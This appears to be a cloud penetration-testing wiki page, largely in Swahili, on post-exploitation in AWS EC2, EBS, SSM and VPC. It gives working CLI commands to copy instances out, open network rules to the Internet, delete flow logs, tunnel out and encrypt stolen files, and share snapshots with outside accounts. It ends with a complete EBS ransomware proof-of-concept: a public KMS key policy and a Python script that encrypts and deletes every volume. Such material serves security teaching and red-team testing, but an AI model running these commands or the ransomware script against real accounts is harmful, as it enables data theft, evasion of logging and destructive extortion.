AWS - EC2, EBS, SSM & VPC Post Exploitation

Reading time: 19 minutes

EC2 & VPC

Kwa habari zaidi angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Malicious VPC Mirror - ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule

VPC traffic mirroring hufanya nakala za trafiki zote zinazoingia na kutoka kwa EC2 instances ndani ya VPC bila hitaji la kusakinisha chochote kwenye instances wenyewe. Trafiki hii iliyodubliwa kwa kawaida ingepelekwa kwa kitu kama network intrusion detection system (IDS) kwa uchambuzi na ufuatiliaji.
Mshambulizi anaweza kuutumia vibaya hili kunasa trafiki yote na kupata taarifa nyeti kutoka kwake:

Kwa habari zaidi angalia ukurasa huu:

AWS - Malicious VPC Mirror

Copy Running Instance

Instances kawaida zina aina fulani ya taarifa nyeti. Kuna njia mbalimbali za kuingia ndani (angalia EC2 privilege escalation tricks). Hata hivyo, njia nyingine ya kuangalia kile kilichomo ni ya kuunda AMI na kuendesha instance mpya (hata kwenye account yako mwenyewe) kutoka kwake:

# List instances
aws ec2 describe-images

# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1

# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1

EBS Snapshot dump

Snapshots ni chelezo za volumes, ambazo kwa kawaida zitakuwa na taarifa nyeti, kwa hivyo kuzikagua kunapaswa kufichua taarifa hizi.
Ikiwa utapata volume without a snapshot unaweza: Create a snapshot na kufanya hatua zifuatazo au tu mount it in an instance ndani ya account:

AWS - EBS Snapshot Dump

Covert Disk Exfiltration via AMI Store-to-S3

Export EC2 AMI moja kwa moja kwenda S3 kwa kutumia CreateStoreImageTask ili kupata raw disk image bila kushirikisha snapshot. Hii inaruhusu uchunguzi wa forensiki kamili nje ya mtandao au wizi wa data huku networking ya instance ikibaki isiyoguswa.

AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)

Live Data Theft via EBS Multi-Attach

Unganisha io1/io2 Multi-Attach volume kwenye instance ya pili na ui-mount kwa read-only ili kukamata live data bila snapshots. Inafaa wakati victim volume tayari ina Multi-Attach imewezeshwa ndani ya AZ ile ile.

AWS - Live Data Theft via EBS Multi-Attach

EC2 Instance Connect Endpoint Backdoor

Tengeneza EC2 Instance Connect Endpoint, ruhusu ingress, na weka ephemeral SSH keys ili kufikia private instances kupitia tunnel inayosimamiwa. Hutoa njia za haraka za lateral movement bila kufungua public ports.

AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection

EC2 ENI Secondary Private IP Hijack

Hamisha secondary private IP ya ENI ya victim kwenda ENI inayodhibitiwa na attacker ili kujifanya trusted hosts zinazoorodheshwa kwa IP. Inaruhusu kuepuka ACLs za ndani au SG rules zilizoambatishwa na anwani maalum.

AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

Elastic IP Hijack for Ingress/Egress Impersonation

Weka upya association ya Elastic IP kutoka instance ya victim kwenda kwa attacker ili kunasa inbound traffic au kuanzisha outbound connections zinazoonekana kuja kutoka kwa IP za umma zilizothibitishwa.

AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Security Group Backdoor via Managed Prefix Lists

Ikiwa rule ya security group inarejea customer-managed prefix list, kuongeza attacker CIDRs kwenye list hiyo kunapanua kwa ukimya ufikiaji kwenye kila rule ya SG inayotegemea bila kubadilisha SG yenyewe.

AWS - Security Group Backdoor via Managed Prefix Lists

VPC Endpoint Egress Bypass

Tengeneza gateway au interface VPC endpoints ili kupata tena outbound access kutoka subnets zilizotengwa. Kutumia AWS-managed private links kunavunja controls za IGW/NAT zilizokosekana kwa ajili ya data exfiltration.

AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

ec2:AuthorizeSecurityGroupIngress

Attacker mwenye ruhusa ya ec2:AuthorizeSecurityGroupIngress anaweza kuongeza inbound rules kwa security groups (kwa mfano, kuruhusu tcp:80 kutoka 0.0.0.0/0), hivyo kuonyesha huduma za ndani kwenye public Internet au mitandao isiyoidhinishwa.

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0

ec2:ReplaceNetworkAclEntry

Mshambulizi mwenye ruhusa za ec2:ReplaceNetworkAclEntry (au sawa) anaweza kubadilisha Network ACLs (NACLs) za subnet ili kuzifanya ziwe laini sana — kwa mfano kuruhusu 0.0.0.0/0 kwenye ports muhimu — hivyo kufichua anuwai yote ya subnet kwa Internet au kwa sehemu za mtandao zisizoidhinishwa. Tofauti na Security Groups, ambazo zinawekwa kwa kila instance, NACLs zinawekwa kwenye ngazi ya subnet, hivyo kubadilisha NACL kali kunaweza kuwa na blast radius kubwa zaidi kwa kuwezesha upatikanaji kwa hosts wengi zaidi.

aws ec2 replace-network-acl-entry \
--network-acl-id <ACL_ID> \
--rule-number 100 \
--protocol <PROTOCOL> \
--rule-action allow \
--egress <true|false> \
--cidr-block 0.0.0.0/0

ec2:Delete*

An attacker with ec2:Delete* and iam:Remove* permissions anaweza kufuta rasilimali muhimu za miundombinu na usanidi — kwa mfano key pairs, launch templates/versions, AMIs/snapshots, volumes or attachments, security groups or rules, ENIs/network endpoints, route tables, gateways, or managed endpoints. Hii inaweza kusababisha kuvurugika kwa huduma mara moja, kupoteza data, na kupoteza ushahidi wa forensiki.

One example is deleting a security group:

aws ec2 delete-security-group
--group-id <SECURITY_GROUP_ID>

VPC Flow Logs Cross-Account Exfiltration

Elekeza VPC Flow Logs kwenye attacker-controlled S3 bucket ili kukusanya metadata ya mtandao (source/destination, ports) nje ya victim account kwa reconnaissance ya muda mrefu.

AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Data Exfiltration

DNS Exfiltration

Hata ukifunga EC2 ili hakuna trafiki itakayoweza kutoka, bado inaweza exfil via DNS.

• VPC Flow Logs haitayarekodi hili.
• Huna ufikiaji wa AWS DNS logs.
• Zima hili kwa kuweka "enableDnsSupport" kuwa false kwa kutumia:

aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>

Exfiltration via API calls

An attacker anaweza kupiga API endpoints za account anayotawaliwa naye. Cloudtrail itarekodi miito hii na attacker ataweza kuona exfiltrate data katika Cloudtrail logs.

Open Security Group

Unaweza kupata upatikanaji zaidi wa huduma za mtandao kwa kufungua ports kama hili:

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC

Privesc to ECS

Inawezekana kuendesha EC2 instance na kuisajili ili itumike kuendesha ECS instances, kisha kuiba data za ECS instances.

Kwa maelezo zaidi angalia hapa.

Ondoa VPC flow logs

aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>

SSM Port Forwarding

Ruhusa zinazohitajika:

• ssm:StartSession

Mbali na utekelezaji wa amri, SSM inaruhusu traffic tunneling ambayo inaweza kutumiwa vibaya kufanya pivot kutoka kwa EC2 instances ambazo hazina ufikaji wa mtandao kwa sababu ya Security Groups au NACLs. Moja ya mazingira ambapo hili ni muhimu ni kufanya pivot kutoka kwa Bastion Host kwenda kwenye private EKS cluster.

In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

1. Sakinisha SessionManagerPlugin kwenye mashine yako
2. Ingia kwenye Bastion EC2 ukitumia amri ifuatayo:

aws ssm start-session --target "$INSTANCE_ID"

3. Pata Bastion EC2 AWS temporary credentials kwa kutumia Abusing SSRF in AWS EC2 environment script
4. Hamisha credentials kwenye mashine yako katika faili $HOME/.aws/credentials kama profile [bastion-ec2]
5. Ingia kwenye EKS kama Bastion EC2:

aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>

6. Sasisha kipengee cha server katika faili $HOME/.kube/config ili kiashirie https://localhost
7. Unda tuneli ya SSM kama ifuatavyo:

sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>

8. Trafiki kutoka kwa zana ya kubectl sasa imepelekwa kupitia tundu la SSM kupitia Bastion EC2, na unaweza kufikia cluster ya kibinafsi ya EKS kutoka kwenye mashine yako mwenyewe kwa kuendesha:

kubectl get pods --insecure-skip-tls-verify

Note that the SSL connections will fail unless you set the --insecure-skip-tls-verify flag (or its equivalent in K8s audit tools). Kwa kuwa trafiki inapitishwa kupitia AWS SSM tunnel iliyo salama, uko salama dhidi ya aina yoyote ya mashambulizi ya MitM.

Hatimaye, mbinu hii si maalum kwa kushambulia private EKS clusters. Unaweza kuweka domeni na bandari yoyote ili ku-pivot kwenda huduma nyingine yoyote ya AWS au programu maalum.

Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)

Ikiwa unahitaji tu kupitisha port moja ya TCP kutoka EC2 instance kwenda local host yako unaweza kutumia SSM document ya AWS-StartPortForwardingSession (hakuna remote host parameter inayohitajika):

aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>

Amri inaunda tuneli ya pande mbili kati ya workstation yako (localPortNumber) na port iliyochaguliwa (portNumber) kwenye instance without opening any inbound Security-Group rules.

Matumizi ya kawaida:

• File exfiltration

1. Kwenye instance, anzisha HTTP server ya haraka inayoelekeza kwenye directory unayotaka exfiltrate:

python3 -m http.server 8000

2. Kutoka kwenye workstation yako, pakua faili kupitia SSM tunnel:

curl http://localhost:8000/loot.txt -o loot.txt

• Kupata maombi ya wavuti za ndani (mf. Nessus)

# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835

Kidokezo: Kandamiza na encrypt ushahidi kabla ya exfiltrating ili CloudTrail isirekodi clear-text content:

# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'

Kushirikisha AMI

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Tafuta taarifa nyeti katika AMIs za umma na za kibinafsi

• https://github.com/saw-your-packet/CloudShovel: CloudShovel ni chombo kilichoundwa kutafuta taarifa nyeti ndani ya Amazon Machine Images (AMIs) za umma au za kibinafsi. Inarahisisha mchakato wa kuanzisha instances kutoka AMIs lengwa, mounting volumes zao, na kukagua kwa uwezekano wa secrets au data nyeti.

Shiriki EBS Snapshot

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

EBS Ransomware PoC

Thibitisho la dhana linalofanana na demo ya Ransomware iliyowasilishwa katika noti za S3 post-exploitation. KMS inapaswa kubadilishwa jina kuwa RMS kwa Ransomware Management Service kutokana na urahisi wa kuitumia ku-encrypt huduma mbalimbali za AWS.

Kwanza kutoka kwenye akaunti ya 'attacker' ya AWS, tengeneza customer managed key katika KMS. Kwa mfano huu tutamwachia AWS kudhibiti key data kwangu, lakini katika senario halisi mwovu angehifadhi key data nje ya udhibiti wa AWS. Badilisha key policy ili kuruhusu Principal yeyote wa akaunti ya AWS kutumia key hiyo. Kwa key policy hii, jina la akaunti lilikuwa 'AttackSim' na rule ya policy inayoruhusu upatikanaji wote inaitwa 'Outside Encryption'

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Sheria ya key inahitaji yafuatayo ziwe zimewezeshwa ili kuruhusu uwezo wa kuitumia ku-encrypt volume ya EBS:

• kms:CreateGrant
• kms:Decrypt
• kms:DescribeKey
• kms:GenerateDataKeyWithoutPlainText
• kms:ReEncrypt

Sasa kwa kuwa key hiyo iko hadharani kwa matumizi. Tunaweza kutumia akaunti ya 'victim' ambayo ina baadhi ya instances za EC2 zilizowekwa zikiwa na EBS volumes zisizofichwa (unencrypted) zilizounganishwa. EBS volumes za akaunti ya 'victim' ndizo tunazolenga ku-encrypt; shambulio hili linafanyika kwa kuzingatia uvunjaji wa akaunti ya AWS yenye ruhusa za juu.

Kwa namna sawa na mfano wa ransomware wa S3. Shambulio hili litaunda nakala za EBS volumes zilizounganishwa kwa kutumia snapshots, litumie key iliyopo hadharani kutoka akaunti ya 'attacker' ku-encrypt EBS volumes mpya, kisha litenganishe EBS volumes za asili kutoka kwa instances za EC2 na kuzifuta, na hatimaye kufuta snapshots zilizotumika kuunda EBS volumes mpya zilizofichwa (encrypted).

Hii inasababisha kubaki tu EBS volumes zilizofichwa (encrypted) zilizopatikana katika akaunti.

Pia inafaa kutaja, script ilizuia instances za EC2 ili kutenganisha na kufuta EBS volumes za asili. Volumes za asili zisizofichwa (unencrypted) zimeondolewa sasa.

Ifuatayo, rudi kwenye key policy katika akaunti ya 'attacker' na ondoa sheria ya sera 'Outside Encryption' kutoka kwenye key policy.

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.

But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.

This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day.

import boto3
import argparse
from botocore.exceptions import ClientError

def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes

def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids

def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])

def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']

volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids

def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']

if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")

except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")

def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")

def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)

all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)

def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed

def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()

def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)

if __name__ == "__main__":
main()

Marejeo

• Pentest Partners – How to transfer files in AWS using SSM